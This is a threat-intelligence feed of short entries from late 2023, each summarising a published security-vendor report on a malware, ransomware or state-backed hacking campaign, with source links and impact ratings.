Intel Source:: Elastic

Intel Name:: The_DPRK_infects_blockchain_engineers_with_new_macOS_malware

Date of Scan:: 2023-11-01

Impact:: LOW

Summary:: The article describes the malicious code KANDYKORN used by the Lazarus Group to access and exfiltrate data from victims' computers. It utilizes reflective loading and encrypted RC4 protocol to communicate with the C2 server. It also provides EQL queries, YARA rules, and observables related to the SUGARLOADER, HLOADER, and KANDYKORN payloads.

Source: https://www.elastic.co/security-labs/elastic-catches-dprk-passing-out-kandykorn

Intel Source:: Palo Alto

Intel Name:: Monitoring_Malicious_Activities_Using_Revealed_IAM_Keys

Date of Scan:: 2023-11-01

Impact:: MEDIUM

Summary:: In an attempt to aid cryptojacking activities, a new ongoing campaign known as EleKtra-Leak is focusing on exposed identity and access management (IAM) credentials from Amazon Web Services (AWS) inside open GitHub projects.

Source: https://unit42.paloaltonetworks.com/malicious-operations-of-exposed-iam-keys-cryptojacking/#post-130743-_zb3397lw03tn

Intel Source:: Proofpoint

Intel Name:: IcedID_Forked_Loader_Delivered_by_TA571

Date of Scan:: 2023-10-31

Impact:: LOW

Summary:: Researchers at Proofpoint have discovered that on October 11 and 18, 2023, TA571 delivered the Forked variation of IcedID in two campaigns. Each of the two campaigns' more than 6,000 messages reached more than 1,200 clients worldwide across numerous industries. The campaigns' emails claimed to be responses to already-existing discussions. Thread hijacking is the term for this. The emails had 404 TDS URLs that led to the download of a zip file that required a password, which was provided in the email. Before sending the zip archive, the attack chain contained a number of tests to make sure the recipient was legitimate

Source: https://www.proofpoint.com/us/blog/threat-insight/security-brief-ta571-delivers-icedid-forked-loader

Intel Source:: Security Joes

Intel Name:: BiBi_Linux_a_new_wiper

Date of Scan:: 2023-10-31

Impact:: MEDIUM

Summary:: Security Joes analysts had the forensics investigation and found what appears to be a new Linux Wiper malware we track as BiBi-Linux Wiper.This malware is an x64 ELF executable, lacking obfuscation or protective measures. It allows attackers to specify target folders and can potentially destroy an entire operating system if run with root permissions.

Source: https://www.securityjoes.com/post/bibi-linux-a-new-wiper-dropped-by-pro-hamas-hacktivist-group

Intel Source:: The DFIR Report

Intel Name:: Invasions_by_Netsupport_Result_in_Domain_Compromises

Date of Scan:: 2023-10-30

Impact:: LOW

Summary:: Researchers from the DFIR Report examined a January 2023 case in which a network was compromised using a NetSupport RAT. After that, a full domain breach was achieved through the usage of the RAT for persistence and command and control.

Source: https://thedfirreport.com/2023/10/30/netsupport-intrusion-results-in-domain-compromise/

Intel Source:: CERT SSI

Intel Name:: Numerous_Critical_Networks_Breached_by_Russian_State_Hackers

Date of Scan:: 2023-10-30

Impact:: MEDIUM

Summary:: Since the second part of 2021, the Russian hacking group APT28 (also known as "Strontium" or "Fancy Bear") has been focusing on French government agencies, corporations, academic institutions, research centers, and think tanks. The attack group was recently connected to the exploitation of two vulnerabilities: CVE-2023-23397, a zero-day privilege elevation weakness in Microsoft Outlook, and CVE-2023-38831, a remote code execution vulnerability in WinRAR. The threat group is thought to be a part of Russia's military intelligence service GRU.

Source: https://www.cert.ssi.gouv.fr/uploads/CERTFR-2023-CTI-009.pdf

Intel Source:: Malwarebytes

Intel Name:: Dynamic_Search_Ads_Delivering_Malware

Date of Scan:: 2023-10-30

Impact:: LOW

Summary:: Researchers at Malwarebytes have examined an other situation in which, bizarre as it may seem, malvertising is completely unintentional. This is the result of two distinct elements coming together: Google Dynamic Search Ads and a hijacked website.

Source: https://www.malwarebytes.com/blog/threat-intelligence/2023/10/malvertising-via-dynamic-search-ads-delivers-malware-bonanza

Intel Source:: Sucuri

Intel Name:: Fake_Google_chrome_update_malware

Date of Scan:: 2023-10-30

Impact:: LOW

Summary:: Fake Google Chrome update malware, associated with SocGholish, tricks users into downloading a RAT. Attackers modify the official download page, and malicious JavaScript code triggers a malicious download when the "Update" button is clicked. The malware belongs to the Zgrat and Redline Stealer families. Website owners should patch plugins/themes, secure/harden WordPress, and keep backups to protect against this malware.

Source: https://blog.sucuri.net/2023/10/fakeupdateru-chrome-update-infection-spreads-trojan-malware.html

Intel Source:: Elastic

Intel Name:: Hackers_Infect_Windows_Systems_with_MSIX_App_Packages

Date of Scan:: 2023-10-30

Impact:: MEDIUM

Summary:: A fresh cyberattack operation has been noticed that distributes a unique malware loader known as GHOSTPULSE by employing phony MSIX Windows app package files for widely used programs like Google Chrome, Microsoft Edge, Brave, Grammarly, and Cisco Webex.

Source: https://www.elastic.co/security-labs/ghostpulse-haunts-victims-using-defense-evasion-bag-o-tricks

Intel Source:: ASEC

Intel Name:: Remcos_RAT_Distribution_Clad_in_Payslip

Date of Scan:: 2023-10-30

Impact:: LOW

Summary:: Researchers from ASEC have uncovered instances when the Remcos remote control virus is disseminated using emails that look like paystubs.

Source: https://asec.ahnlab.com/en/58195/

Intel Source:: Zscaler

Intel Name:: A_Look_Back_at_AvosLocker

Date of Scan:: 2023-10-30

Impact:: LOW

Summary:: According to Zscaler analysts' analysis, AvosLocker is a ransomware group that was operational up to May 2023, carrying out double extortion attacks. The organization used various ransomware strains to attack multiple operating systems.

Source: https://www.zscaler.com/blogs/security-research/retrospective-avoslocker

Intel Source:: Cyble

Intel Name:: The_Higaisa_APT_group_targeting_Chinese_users

Date of Scan:: 2023-10-27

Impact:: LOW

Summary:: Cyble researchers has observed a new APT campaign targeting on tricking unsuspecting victims through phishing and coping well known computer applications. This time, a phishing website was observed pretending as OpenVPN software made up for Chinese users and serves as a host to deliver the malicious payload.

Source: https://cyble.com/blog/higaisa-apt-resurfaces-via-phishing-website-targeting-chinese-users/

Intel Source:: Securelist

Intel Name:: Introducing_Lazarus_New_Campaign

Date of Scan:: 2023-10-27

Impact:: MEDIUM

Summary:: Researchers at Securelist have found that the company that created the compromised software has already been repeatedly hacked by Lazarus. This repeated breach indicated a persistent and determined threat actor that continued to target additional software developers while exploiting weaknesses in the company's software, most likely with the intention of obtaining important source code or interfering with the software supply chain.

Source: https://securelist.com/unveiling-lazarus-new-campaign/110888/

Intel Source:: Securelist

Intel Name:: StripedFly_exploit

Date of Scan:: 2023-10-27

Impact:: LOW

Summary:: Securelist observed and detailed out another cryptocurrency miner. This StripedFly exploit masked behind modular framework that supports both Linux and Windows. It comes together with a built-in TOR network tunnel for communication with command servers, along with update and delivery functionality through trusted services such as GitLab, GitHub, and Bitbucket, all using custom encrypted archives.

Source: https://securelist.com/stripedfly-perennially-flying-under-the-radar/110903/

Intel Source:: Cluster25

Intel Name:: LinkedIn_Based_Identity_Theft_Campaign_Leveraging_DuckTail_Malware

Date of Scan:: 2023-10-26

Impact:: LOW

Summary:: A recent campaign exploits compromised LinkedIn accounts to target Italian technology professionals, primarily in sales and finance roles. Attackers use LinkedIn messages to distribute fraudulent job offers with embedded malicious links that lead to phishing sites and deliver DuckTail malware. This malware steals browser data, including cookies and credentials, which are exfiltrated through a Telegram bot. The malware also facilitates Facebook Business hijacking.

Source: https://blog.cluster25.duskrise.com/2023/10/25/the-duck-is-hiring

Intel Source:: PWC

Intel Name:: Iranian_Group_Tortoiseshell_Using_IMAPLoader_Malware

Date of Scan:: 2023-10-26

Impact:: MEDIUM

Summary:: A new wave of watering hole attacks that are intended to release a malware called IMAPLoader has been linked to the Iranian threat actor Tortoiseshell. "IMAPLoader is a.NET malware that has the ability to fingerprint victim systems using native Windows utilities and acts as a downloader for further payloads," the statement reads.

Source: https://www.pwc.com/gx/en/issues/cybersecurity/cyber-threat-intelligence/yellow-liderc-ships-its-scripts-delivers-imaploader-malware.html

Intel Source:: Netscope

Intel Name:: Menorah_malware_details

Date of Scan:: 2023-10-26

Impact:: LOW

Summary:: This month, Netskope analysts investigated a suspicious Word document that had malware it contained, dubbed “Menorah.” The malware was linked to the threat group APT34, and distributed via spear-phishing. The malicious Office file uses spread and obfuscated VBA code to evade detection.

Source: https://www.netskope.com/blog/netskope-threat-coverage-menorah

Intel Source:: WeliveSecurity

Intel Name:: The_Winter_Vivern_cyberespionage_operations

Date of Scan:: 2023-10-26

Impact:: LOW

Summary:: ESET researchers have been monitoring the operations of Winter Vivern for a long time and recently that the threat actors started exploiting a zero-day XSS vulnerability in the Roundcube Webmail server in the beginning of October, 2023. ESET telemetry data showed the campaign's target is Roundcube Webmail servers belonging to governmental entities and a think tank, all in Europe

Source: https://www.welivesecurity.com/en/eset-research/winter-vivern-exploits-zero-day-vulnerability-roundcube-webmail-servers/

Intel Source:: Zscaler

Intel Name:: The_Mystic_Stealer_Returns

Date of Scan:: 2023-10-26

Impact:: LOW

Summary:: Early in 2023, the downloader and information stealer known as Mystic Stealer made its appearance. A multitude of web browsers and cryptocurrency wallet applications are used by the spyware to gather data.

Source: https://www.zscaler.com/blogs/security-research/mystic-stealer-revisited#indicators-of-compromise--iocs-

Intel Source:: Antiy CERT

Intel Name:: Active_WatchDog_mining_organization_samples_analyses

Date of Scan:: 2023-10-25

Impact:: MEDIUM

Summary:: This month, Antiy CERT got some active WatchDog mining organization samples. This organization mainly uses exposed Docker Engine API endpoints and Redis servers to attack and can quickly move from an infected machine to the entire network. The WatchDog mining organization started their activity in January 2019 and is still active today.

Source: https://www.antiy.cn/research/notice&report/research_report/WatchDogTrojans_Analysis.html

Intel Source:: The Hackers News

Intel Name:: North_Korean_IT_Scammers_Defrauding_Global_Businesses

Date of Scan:: 2023-10-25

Impact:: MEDIUM

Summary:: The Republic of Korea and the U.S. posted about their seizure of 17 website domains used by North Korean information technology (IT) workers as part of an illigal scheme to defraud businesses across the world, evade sanctions, and fund the country's ballistic missile program.

Source: https://thehackernews.com/2023/10/us-doj-cracks-down-on-north-korean-it_20.html

Intel Source:: Malwarebytes

Intel Name:: Malvertising_campaigns_for_WhatsApp_and_Telegram

Date of Scan:: 2023-10-25

Impact:: LOW

Summary:: Malwarebytes did research and investigation on an increase in malicious webpages for the WhatsApp communication tool, driven via malicious Google ads. The suspicious sites they saw had similar page than the web version of WhatsApp to trick victims into scanning a QR code to link their new device. Alco, the researchers discovered another campaign using an ad for messaging tool Telegram, to lure victims into downloading a malicious version of the program. Again, this attack was targeted at residents of Hong Kong.

Source: https://www.malwarebytes.com/blog/threat-intelligence/2023/10/hong-kong-residents-targeted-in-malvertising-campaigns-for-whatsapp-telegram

Intel Source:: Talos

Intel Name:: Kazakhstan_associated_YoroTrooper_operators

Date of Scan:: 2023-10-25

Impact:: LOW

Summary:: Talos discovered and made a desicion that YoroTrooper operators are based in Kazakhstan based on their language use, use of Kazakhstani currency, which only included the government’s Anti-Corruption Agency.

Source: https://blog.talosintelligence.com/attributing-yorotrooper/

Intel Source:: Securelist

Intel Name:: Attacks_on_Russian_Federation_Government_And_Industrial_Sectors

Date of Scan:: 2023-10-25

Impact:: MEDIUM

Summary:: Data theft is the goal of several harmful programs that researchers have found. They can presume that the attackers' primary objective is to steal data from companies in these industries because Kaspersky Threat Intelligence reports that similar programs have been discovered in a number of other government and industrial entities in the Russian Federation.

Source: https://securelist.ru/ataki-na-industrialnyj-i-gosudarstvennyj-sektory-rf/108229/

Intel Source:: Securelist

Intel Name:: New_Lumar_stealer_and_Rhysida_ransomware

Date of Scan:: 2023-10-24

Impact:: MEDIUM

Summary:: Securelist analyzed the details on malware that has been active this year: the GoPIX stealer that attacks the PIX payment system, which is popular in Brazil; the Lumar multipurpose stealer advertised on the dark web; and the Rhysida ransomware supporting old Windows versions.

Source: https://securelist.com/crimeware-report-gopix-lumar-rhysida/110871/

Intel Source:: Securityscorecard

Intel Name:: Deep_analysis_of_Cactus_ransomware

Date of Scan:: 2023-10-24

Impact:: LOW

Summary:: Security ScoreCard researchers shared their detailed analysis about Cactus Ransomware which was first discovered in March 2023. The malware creates a mutex called “b4kr-xr7h-qcps-omu3cAcTuS” to ensure that only one copy is running at a time. Persistence is achieved by creating a scheduled task named “Updates Check Task”. The ransomware requires an AES key to decrypt the encrypted public RSA key stored in the binary.

Source: https://securityscorecard.com/research/deep-dive-into-cactus-ransomware/

Intel Source:: Gdatasoftware

Intel Name:: Facebook_malicious_Ads

Date of Scan:: 2023-10-24

Impact:: LOW

Summary:: Threat actors take advantage of business accounts on Facebook and run their own advertising campaigns in someone else's name and at the expense of those affected. Gdatasoftware shared their analysis and a closer look at one such case here.

Source: https://www.gdatasoftware.com/blog/2023/10/37814-meta-hijacked-malicious-ads

Intel Source:: Any Run

Intel Name:: The_use_of_Steganography_in_recent_malware_attacks

Date of Scan:: 2023-10-24

Impact:: LOW

Summary:: Any.Run analysts recently spotted a surge in the use of steganography method attacks in cyber attacks and shares the details of it in the blog. Steganography hides data within another file or medium, effectively making it invisible.

Source: https://any.run/cybersecurity-blog/steganography-in-malware-attacks/

Intel Source:: Cert.Pl

Intel Name:: Deworming_the_XWorm_malware

Date of Scan:: 2023-10-24

Impact:: LOW

Summary:: Cert. Pl shared their post wit a detailed analysis and walk-through the reverse-engineering process of a malware family called XWorm. XWorm is a multi-purpose malware family, commonly used as RAT.

Source: https://cert.pl/en/posts/2023/10/deworming-the-xworm/

Intel Source:: Uptycs

Intel Name:: Quasar_RAT_Using_Side_Loading_DLL_Methods

Date of Scan:: 2023-10-23

Impact:: LOW

Summary:: To accomplish its goals, the Quasar RAT using a method called DLL side-loading, which entailed utilizing trusted Microsoft files like "calc.exe" and "ctfmon.exe." This method makes use of the built-in trust that these files have in the Windows environment.

Source: https://www.uptycs.com/blog/quasar-rat

Intel Source:: Intrinsec

Intel Name:: Lumma_Stealer_multiple_campaigns

Date of Scan:: 2023-10-23

Impact:: MEDIUM

Summary:: A report on Lumma Stealer, a malware-as-a-service sold through Telegram and Russian-speaking forums, has been published by the European Union's cyber security agency, Intrinsec.

Source: https://www.intrinsec.com/wp-content/uploads/2023/10/TLP-CLEAR-Lumma-Stealer-EN-Information-report.pdf

Intel Source:: Okta

Intel Name:: Customer_Data_Exposed_by_Okta_Support_System_Breach

Date of Scan:: 2023-10-23

Impact:: LOW

Summary:: The identity services company Okta have revealed a fresh security incident in which it became possible for unknown threat actors to gain access to its support case management system by using credentials that they had stolen. Note that the Okta support case management system is distinct from the production Okta service, which is up and running and unaffected. The threat actor was able to examine files uploaded by specific Okta customers as part of recent support cases.

Source: https://sec.okta.com/harfiles

Intel Source:: Cyfirma

Intel Name:: A_Python_Based_Info_stealer_Akira

Date of Scan:: 2023-10-23

Impact:: LOW

Summary:: Cyfirma analysts provided a comprehensive investigation report of this Akira information stealer malware, unfolding its functionality and capabilities.

Source: https://www.cyfirma.com/outofband/akira-stealer-an-undetected-python-based-info-stealer/

Intel Source:: Sentilone

Intel Name:: Traditional_and_modern_threat_hunting_methodologies

Date of Scan:: 2023-10-21

Impact:: LOW

Summary:: This article discusses traditional and modern threat hunting methodologies, emphasizing the need for experienced professionals and effective tooling. It provides examples of successful hunts, such as the SolarWinds SERV-U Vulnerability and the Akira ransomware campaign, and outlines the use of advanced tools, AI/machine learning algorithms, and threat intelligence integration.

Source: https://www.sentinelone.com/blog/a-modern-approach-to-adaptive-threat-hunting-methodologies/

Intel Source:: Trellix

Intel Name:: The_analyzes_of_malware_that_abuses_Discord_infrastructure

Date of Scan:: 2023-10-21

Impact:: LOW

Summary:: Malicious actors are using Discord's Content Delivery Network (CDN) and webhooks to download additional files and exfiltrate information. A sample targeting Ukrainian critical infrastructures was recently discovered, indicating that APT groups may be using Discord. Technical analysis of the sample was provided, along with detection and IoCs. Loaders written in .NET are the most popular malware families using Discord's CDN, and function-level retro-hunting was used to identify them.

Source: https://www.trellix.com/en-au/about/newsroom/stories/research/discord-i-want-to-play-a-game/

Intel Source:: Anomali

Intel Name:: RomCom_4_0_Targeted_Female_Politicians

Date of Scan:: 2023-10-21

Impact:: LOW

Summary:: The article discusses the US Health Sector Cybersecurity Coordination Center's report on the NoEscape ransomware, ShellBot DDoS bot, and Tropical ScorpiusVoid cyberespionage group. It recommends having a comprehensive and tested backup solution, running the most current software version, and practicing defense-in-depth. It also lists various MITRE ATT&CK techniques and tags associated with each threat.

Source: https://www.anomali.com/blog/anomali-cyber-watch-romcom-4-0-targeted-female-politicians-israeli-redalert-app-impersonated-and-more

Intel Source:: Malwarebytes

Intel Name:: Fake_KeePass_Site_Leveraging_Google_Ads_and_Punycode_to_Spread_Malware

Date of Scan:: 2023-10-20

Impact:: LOW

Summary:: Researchers at Malwarebytes discovered a very dishonest harmful Google ad for the open-source password manager KeePass. They have already written on how tracking templates have made it easier for people to impersonate brands these days, but this attack added another degree of deceit.

Source: https://www.malwarebytes.com/blog/threat-intelligence/2023/10/clever-malvertising-attack-uses-punycode-to-look-like-legitimate-website

Intel Source:: Fortinet

Intel Name:: A_Novel_Low_Cost_Cybercrime_Tool_Is_Introduced

Date of Scan:: 2023-10-20

Impact:: LOW

Summary:: Researchers from FortiGate have discovered that ExelaStealer is essentially an open-source InfoStealer that the threat actor can customize for a fee. Although it uses resources from other languages (like JavaScript) when necessary, it is written in Python. Sensitive data, including credit card numbers, passwords, cookies, session data, and basic keylogging, can be stolen from a Windows-based host.

Source: https://www.fortinet.com/blog/threat-research/exelastealer-infostealer-enters-the-field

Intel Source:: Palo Alto

Intel Name:: A_New_Tactic_For_BlackCat_Ransomware

Date of Scan:: 2023-10-20

Impact:: LOW

Summary:: Researchers at PaloAlto have noticed that the BlackCat/ALPHV ransomware operation has started to use a new tool called "Munchkin," which uses virtual machines to covertly install encryptors on network devices. Manchkin makes it possible for BlackCat to operate on distant systems and encrypt network shares such as Common Internet File System (CIFS) or Server Message Block (SMB).

Source: https://unit42.paloaltonetworks.com/blackcat-ransomware-releases-new-utility-munchkin/#post-130681-_v8176g40kstn

Intel Source:: Cyble

Intel Name:: Italian_Clipper

Date of Scan:: 2023-10-20

Impact:: LOW

Summary:: CRIL recently uncovered a malicious phishing campaign orchestrated by a threat actor targeting Italian-speaking users. The campaign employed various techniques, including droppers, obfuscators, crypters, fileless malware, crypto address theft, and exfiltration via Discord. The malware, Pure Clipper, was designed to steal or manipulate cryptocurrency-related data, such as wallet addresses. The threat actor used a .NET dropper concealed by SmartAssembly, which included a legitimate Tor Installer and a PureCrypter binary. The Clipper was designed to steal cryptocurrency addresses and interact with the TA's Command and Control (C&C) system through Discord. The operation also showcased persistence through Registry manipulation and Task Scheduler entries.

Source: https://cyble.com/blog/fileless-pure-clipper-malware-italian-users-in-the-crosshairs/

Intel Source:: vmware

Intel Name:: An_Analysis_of_Malware_as_a_Service_on_the_Dark_web

Date of Scan:: 2023-10-20

Impact:: LOW

Summary:: LummaStealer is a Malware-as-a-Service (MaaS) available on the dark web that has been observed evolving from underground platforms to more public hacker forums. This article explores the history of LummaStealer and its attack vectors, including the distribution of the malware through deceptive sites, drive-by downloads, and masquerading as browser updates. It also discusses LummaStealer's dark web presence, multiple sellers, and Russian origin.

Source: https://blogs.vmware.com/security/2023/10/an-ilummanation-on-lummastealer.html

Intel Source:: withsecure

Intel Name:: DarkGate_malware_infection_attempts

Date of Scan:: 2023-10-20

Impact:: LOW

Summary:: This article discusses the DarkGate malware campaign, which is related to the Ducktail campaigns and is conducted by Vietnamese cybercrime groups. It focuses on the use of multiple different MaaS infostealers and RATs to target the digital marketing sector, with the primary goal of hijacking Facebook business accounts. It provides details on the detection of the DarkGate malware infection attempts, the lures and delivery methods used, and the use of MSI Wrapper to wrap executable files in MSI bundles.

Source: https://labs.withsecure.com/publications/darkgate-malware-campaign

Intel Source:: Kaspersky

Intel Name:: Updated_MATA_Targeting_Eastern_European_Industrial_Firms

Date of Scan:: 2023-10-19

Impact:: MEDIUM

Summary:: The attackers targeted a number of victims with spear-phishing emails; some of them downloaded files using an internet browser and became infected with Windows executable malware. A link to an external page that downloads a remote page with the CVE-2021-26411 vulnerability can be found in every phishing document. Through September 2022, the attackers persisted in sending infected documents over email. The campaign ran for a total of six months, ending in May 2023.

Source: https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/10/18092216/Updated-MATA-attacks-Eastern-Europe_full-report_ENG.pdf

Intel Source:: Malwarebytes

Intel Name:: Hackers_Using_Google_Ads_to_Distribute_Weaponized_Notepad

Date of Scan:: 2023-10-19

Impact:: LOW

Summary:: It is well known that cybercriminals use deceptive advertising strategies to target the popular Windows text editor Notepad++. This can result in malware and ransomware spreading. It seems to have totally escaped detection for at least a few months, according to Malwarebytes. Its capacity to distribute time-sensitive payloads and collect user fingerprints makes it special.

Source: https://www.malwarebytes.com/blog/threat-intelligence/2023/10/the-forgotten-malvertising-campaign

Intel Source:: Microsoft

Intel Name:: Hackers_From_North_Korea_Exploiting_TeamCity_Vulnerability

Date of Scan:: 2023-10-19

Impact:: MEDIUM

Summary:: Researchers at Microsoft have discovered that two nation-state threat actors from North Korea, known as Diamond Sleet and Onyx Sleet, are taking advantage of CVE-2023-42793, a remote-code execution vulnerability that affects several JetBrains TeamCity server versions. Organizations utilize TeamCity, a continuous integration/continuous deployment (CI/CD) platform, for DevOps and other software development tasks.

Source: https://www.microsoft.com/en-us/security/blog/2023/10/18/multiple-north-korean-threat-actors-exploiting-the-teamcity-cve-2023-42793-vulnerability/

Intel Source:: Securelist

Intel Name:: The_new_threat_to_B2B

Date of Scan:: 2023-10-19

Impact:: LOW

Summary:: Malicious executable IntelSvc.exe is capable of executing commands, creating folders, and storing configuration files and logs. The conclusion emphasizes the importance of strong security systems in the B2B sector, as cybercriminals are constantly looking for ways to exploit resources for financial gain. Statistics show that since May 2023, over 200 users worldwide have been targeted, with the most frequent attacks occurring in Russia, Saudi Arabia, Vietnam, Brazil, and Romania. Money-making scripts use infected devices to mine Monero cryptocurrency, a keylogger to track keystrokes, and a backdoor to send requests to the C2 server.

Source: https://securelist.com/miner-keylogger-backdoor-attack-b2b/110761/

Intel Source:: Cado Security

Intel Name:: Qubitstrike_Targeting_Jupyter_Notebooks

Date of Scan:: 2023-10-19

Impact:: LOW

Summary:: A threat actor linked to a recent effort that targets unprotected Jupyter Notebooks is likely from Tunisia. The campaign aims to compromise cloud infrastructures and mine cryptocurrencies illegally. The Qubitstrike campaign's payloads are all hosted on codeberg.org, a substitute Git hosting service that offers a lot of the same features as GitHub.

Source: https://www.cadosecurity.com/qubitstrike-an-emerging-malware-campaign-targeting-jupyter-notebooks/

Intel Source:: Cyble

Intel Name:: BbyStealer_malware_campaign_resurfaces

Date of Scan:: 2023-10-19

Impact:: LOW

Summary:: Cyble researchers has discovered a malware that uses multiple phishing domains to target users who are downloading Virtual Private Network (VPN) Windows applications. In this campaign, the downloaded VPN application is used to disseminate an information-stealing malware known as “BbyStealer.”

Source: https://cyble.com/blog/bbystealer-malware-resurfaces-sets-sights-on-vpn-users/

Intel Source:: Google Blog

Intel Name:: State_Actors_Targeting_WinRAR_Flaw_In_Multiple_Campaigns

Date of Scan:: 2023-10-19

Impact:: MEDIUM

Summary:: Google Threat Analysis Group have seen numerous government-sponsored hacking groups taking advantage of WinRAR, a well-known file archiver program for Windows, and its known vulnerability, CVE-2023-38831. When the flaw was still unknown to defenders in early 2023, cybercrime groups started taking use of it. Although there is now a fix available, many users appear to still be at risk. TAG has seen actors with government support from several nations taking advantage of the WinRAR vulnerability in their activities.

Source: https://blog.google/threat-analysis-group/government-backed-actors-exploiting-winrar-vulnerability/

Intel Source:: Sophos

Intel Name:: Ransomware_actor_attacks_unsupported_ColdFusion_servers

Date of Scan:: 2023-10-19

Impact:: MEDIUM

Summary:: An unknown actor attempted to deploy ransomware on obsolete Adobe ColdFusion servers using leaked LockBit 3.0 source code. Sophos X-Ops blocked the attack with endpoint behavioral detections. The attacker left a directory listing of artifacts and hashes, which revealed the intended ransomware payload. The ransom note credited "BlackDog 2023" and demanded 205 Monero.

Source: https://news.sophos.com/en-us/2023/10/19/ransomware-actor-exploits-coldfusion-servers-but-comes-away-empty-handed/

Intel Source:: Symantec

Intel Name:: Crambus_Hackers_Targeting_Middle_Eastern_Government

Date of Scan:: 2023-10-19

Impact:: MEDIUM

Summary:: Between February and September of 2023, the Iranian Crambus espionage group (also known as OilRig, MuddyWater, and APT34) orchestrated an eight-month-long incursion against a Middle Eastern nation. In one instance, the attackers installed a PowerShell backdoor called PowerExchange, which is utilized to monitor incoming emails sent from an Exchange server in order to execute commands sent by the attackers in the form of emails and covertly forward results to the attackers. The attackers also stole files and passwords during the compromise. At least 12 machines saw malicious activity, and there is proof that the attackers installed backdoors and keyloggers on numerous additional computers.

Source: https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/crambus-middle-east-government

Intel Source:: Securelist

Intel Name:: Analysis_of_Alleged_Hack_of_Israeli_Power_Station_Amid_Ongoing_Conflict

Date of Scan:: 2023-10-18

Impact:: LOW

Summary:: The text delves into the cyber activities associated with the Israel-Hamas conflict, including distributed denial-of-service (DDoS) attacks, information warfare, and hacktivism campaigns. It highlights a recent purported hack of the Dorad private power station by a group called Cyber Av3ngers. However, upon analysis, the data presented by Cyber Av3ngers was found to be sourced from an older breach by a separate hacktivist group known as Moses Staff. Moses Staff, allegedly an Iranian hacker group, primarily targets Israeli companies and other organizations globally.

Source: https://securelist.com/a-hack-in-hand-is-worth-two-in-the-bush/110794/

Intel Source:: Elastic

Intel Name:: A_New_Backdoor_Targeting_ASEAN_Organizations_And_Governments

Date of Scan:: 2023-10-18

Impact:: MEDIUM

Summary:: The innovative BLOODALCHEMY backdoor, which is part of the REF5961 intrusion set employed by a China-linked threat operation, is being utilized to attack x86 systems belonging to governments and other organizations that are members of the Association of Southeast Asian Nations.

Source: https://www.elastic.co/security-labs/disclosing-the-bloodalchemy-backdoor

Intel Source:: Cisco Talos

Intel Name:: Cisco_Discovers_Critical_Vulnerability_Exploitation_in_IOS_XE_Software

Date of Scan:: 2023-10-18

Impact:: MEDIUM

Summary:: Cisco has detected an active exploit of a critical vulnerability (CVE-2023-20198) in the Web User Interface feature of Cisco IOS XE software, potentially giving attackers full control of affected devices. Suspicious activity was first observed on September 18, with an implant deployed on October 12. Cisco advises immediate action to mitigate this threat, including disabling the HTTP server on internet-facing systems

Source: https://blog.talosintelligence.com/active-exploitation-of-cisco-ios-xe-software/

Intel Source:: ASEC

Intel Name:: Kimsuky_Threat_Group_Controls_Infected_Systems_Using_RDP

Date of Scan:: 2023-10-18

Impact:: LOW

Summary:: Researchers from ASEC have been keeping an eye on recent incidents in which the Kimsuky group allegedly used spear phishing to install BabyShark before putting various RDP-related malware strains in place. The tools employed in the attacks share characteristics with those in earlier occurrences, however based on their PDB information, it is assumed that they were very recently constructed for attack usage.

Source: https://asec.ahnlab.com/en/57873/

Intel Source:: Vulncheck

Intel Name:: Vulnerabilities_in_Milesight_Industrial_Cellular_Routers

Date of Scan:: 2023-10-18

Impact:: LOW

Summary:: A recent disclosure of CVE-2023-43261 highlights vulnerabilities in Milesight's industrial cellular routers, potentially exposing industrial control system (ICS) networks to the internet. This article explores how these routers are used in various critical infrastructure scenarios, the specifics of the vulnerability, and the extent of its impact in the wild. While the CVE description is misleading, we find that the actual number of vulnerable routers in the wild is relatively low. Nonetheless, some evidence suggests that exploitation is likely occurring, although not at a large scale.

Source: https://vulncheck.com/blog/real-world-cve-2023-43261

Intel Source:: Paloaltonetworks

Intel Name:: XorDDoS_Trojan_Campaign

Date of Scan:: 2023-10-18

Impact:: MEDIUM

Summary:: Paloaltonetworks researchers spotted recent campaign involving the XorDDoS Trojan has drawn attention as attackers manipulate Linux devices to execute remote malicious activities. In this report, an in-depth investigation reveals concealed command and control (C2) network infrastructure, showcasing a shift towards legitimate public hosting services.

Source: https://unit42.paloaltonetworks.com/new-linux-xorddos-trojan-campaign-delivers-malware/

Intel Source:: Welivesecurity

Intel Name:: A_Global_View_of_LATAM_Threats

Date of Scan:: 2023-10-18

Impact:: LOW

Summary:: Researchers from ESET have discovered an increase in evasion techniques and high-value targets in threats affecting the LATAM region.

Source: https://www.welivesecurity.com/en/eset-research/operation-king-tut-universe-threats-latam/

Intel Source:: Symantec

Intel Name:: Grayling_new_threat_actor_targets_organizations_in_Taiwan

Date of Scan:: 2023-10-18

Impact:: LOW

Summary:: There was an observation of new advanced persistent threat group used custom malware and multiple publicly available tools to target a number of organizations in the manufacturing, IT, and biomedical sectors in Taiwan. The Symantec Threat Hunter Team lined this activity a new group we are calling Grayling. This activity stood out due to the use by Grayling of a distinctive DLL sideloading technique that uses a custom decryptor to deploy payloads.

Source: https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/grayling-taiwan-cyber-attacks

Intel Source:: Aitime.Space

Intel Name:: Phishing_abuse_the_marketing_tool_Smart_Links

Date of Scan:: 2023-10-17

Impact:: LOW

Summary:: Aitime news shared the information about the attack that is not first and uses and abuses Smart Links. The threat actor this time used advanced steps in his hacking and used the URL of such a tool to bring it into the recipient's email address in the URL link of the phishing website.

Source: https://news.aitime.space/2023/10/60837/

Intel Source:: Trend Micro

Intel Name:: Lumma_Stealers_Stealthy_Invasion

Date of Scan:: 2023-10-17

Impact:: LOW

Summary:: Researchers at Trend Micro have found cybercriminals are leveraging Discord, a popular chat platform among gamers and content creators, to distribute the information-stealing malware known as Lumma Stealer. Malicious actors manipulate Discord's infrastructure to host and spread this malware while using the platform's API to create bots for remote control

Source: https://www.trendmicro.com/en_us/research/23/j/beware-lumma-stealer-distributed-via-discord-cdn-.html

Intel Source:: Cluster25

Intel Name:: Pro_Russian_Hackers_Exploiting_WinRAR_Vulnerability

Date of Scan:: 2023-10-17

Impact:: MEDIUM

Summary:: A newly discovered security flaw in the WinRAR archiving tool has been taken advantage of by pro-Russian hacker groups as part of a phishing effort aimed at obtaining login credentials from compromised systems.The attack uses malicious archive files to take advantage of a recently identified vulnerability (CVE-2023-38831) that affects WinRAR compression software versions older than 6.23.

Source: https://blog.cluster25.duskrise.com/2023/10/12/cve-2023-38831-russian-attack

Intel Source:: Proofpoint

Intel Name:: The_State_of_Current_Fake_Browser_Updates

Date of Scan:: 2023-10-17

Impact:: LOW

